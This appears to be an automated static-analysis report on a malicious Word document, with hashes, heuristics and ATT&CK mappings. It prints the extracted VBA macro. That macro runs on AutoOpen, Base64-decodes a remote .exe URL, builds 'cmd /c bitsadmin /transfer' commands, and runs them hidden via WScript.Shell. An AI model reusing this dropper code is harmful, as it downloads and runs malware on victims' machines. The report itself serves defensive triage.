Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 72b68df10e943ad4…

MALICIOUS

Office (OLE)

97.5 KB Created: 2018-10-08 17:58:00 Authoring application: Microsoft Office Word First seen: 2019-06-27
MD5: 7d54a816119f26953f47faf74645fca6 SHA-1: 735c879b1b8f026fb1e62937ec92ea228602c648 SHA-256: 72b68df10e943ad4bd87c22c19c1cfb45cd2c8f096878a7c20aab86dffe5641e
224 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1105 Ingress Tool Transfer

The sample is a malicious Office document containing a VBA macro. The macro is triggered by the AutoOpen event and utilizes CreateObject to likely download and execute a second-stage payload. The ClamAV signature 'Doc.Dropper.Agent-6993379-0' further confirms its malicious nature as a dropper.

Heuristics 8

  • ClamAV: Doc.Dropper.Agent-6993379-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6993379-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9408 bytes
SHA-256: cecac8175f06305ba91e78730ec7e7dbe4e16b4ad394caa1c5a23bcf38525a12
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

    Private Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As LongPtr)
    Private Declare PtrSafe Function GetTickCount Lib "kernel32" () As Long



Private Sub Init()
   Dim C As Integer, I As Integer
   ' set Map1
   I = 0
   For C = Asc("A") To Asc("Z"): Map1(I) = C: I = I + 1: Next
   For C = Asc("a") To Asc("z"): Map1(I) = C: I = I + 1: Next
   For C = Asc("0") To Asc("9"): Map1(I) = C: I = I + 1: Next
   Map1(I) = Asc("+"): I = I + 1
   Map1(I) = Asc("/"): I = I + 1
   ' set Map2
   For I = 0 To 127: Map2(I) = 255: Next
   For I = 0 To 63: Map2(Map1(I)) = I: Next
   InitDone = True
   End Sub
Sub highlightValue()
Dim myStr As String
Dim myRg As Range
Dim myTxt As String
Dim myCell As Range
Dim myChar As String
Dim I As Long
Dim J As Long
On Error Resume Next
If ActiveWindow.RangeSelection.Count > 1 Then
myTxt = ActiveWindow.RangeSelection.AddressLocal
Else
myTxt = ActiveSheet.UsedRange.AddressLocal
End If
LInput: Set myRg = Application.InputBox("please select the data range:", "Selection Required", myTxt, , , , , 8)
If myRg Is Nothing Then
Exit Sub


End Sub




Public Sub Pause(Optional Timeout As Single = 5)
    Dim EndTick

 
    EndTick = GetTickCount() + Timeout * 1000
    Do While GetTickCount() <= EndTick
     
        DoEvents

     
        If EndTick - GetTickCount() > 1000 Then
           
            Sleep 1000
        End If
    Loop
End Sub
Sub highlightNegativeNumbers()
Dim Rng As Range
For Each Rng In Selection
If WorksheetFunction.IsNumber(Rng) Then
If Rng.Value < 0 Then
Rng.Font.Color = -16776961
End If
End If
Next
End Sub



Sub FreeDomToDraw()

    FreeDom1 = Base64DecodeString("aHR0cDovL3d3dy5hZG92ZXVwZGF0ZTM2")
     FreeDom11 = Base64DecodeString("NW1hbmFnZXIuY28vRlV2Y3I0NjU0Ni5leGU=")
 
  

  FreeDom13 = FreeDom1 + FreeDom11 + Request
  
  Request = Base64DecodeString("ICV0ZW1wJS8=")
  
       
Tpoutorightfloor = Base64DecodeString("WW1sMGMyRmtiV2x1SUM5MGNtRnVjMlpsY2lCVGIyWjBWWEJrWVhSbElDOWtidz09")



   TpRight = Base64DecodeString("U1VOV1ZWSlZNVkZLVm5oM1dWZHNkV1JETld4bFIxVm4=")

 TpRight = Base64DecodeString(TpRight)
  TpRight = Base64DecodeString(TpRight)

  Application.ScreenUpdating = False

RBKL = Base64DecodeString("TDNCeWFXOXlhWFI1SUVaUFVrVkhVazlWVGtRZw==")
RBKL = Base64DecodeString(RBKL)




   
    
      Tpoutorightfloor = Base64DecodeString(Tpoutorightfloor)
      
    
     
      
      FreeDom2 = Base64DecodeString("Yw==") + Base64DecodeString("bWQ=")
      FreeDom2VP = Base64DecodeString("IC9jIA==")
      
      FreeDomend = Base64DecodeString("V1Njcg==")
FreeDomend = FreeDomend + Base64DecodeString("aXB0LnNoZWxs")


      
      inFreeDom = Tpoutorightfloor + "wnload " + RBKL + FreeDom13
       

       q = FreeDom2 + FreeDom2VP
       t = inFreeDom + TpRight
  
  
    CreateObject(FreeDomend).Run (q + t + ""), 0, True

p = FreeDom2 + FreeDom2VP + TpRight + ""
      Pause (6)

CreateObject(FreeDomend).Run (p), 0, True



          



 
          
          
        
       
       
    
End Sub
Sub UseFunction()
 
 
 
MsgBox Application.WorksheetFunction.Combin(42, 6)
 
 
 
End Sub
 

Sub AutoOpen()
 With ActiveWindow
        .DisplayHorizontalScrollBar = True
        .DisplayVerticalScrollBar = True
    End With
        FreeDomToDraw
Application.ScreenUpdating = False

End Sub


Attribute VB_Name = "UserForm6"
Attribute VB_Base = "0{2D5F34A2-8514-4243-B5B1-5AEA8A8F29AD}{5FBBC783-6588-4BE4-A978-620D3CA9CAA4}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
... (truncated)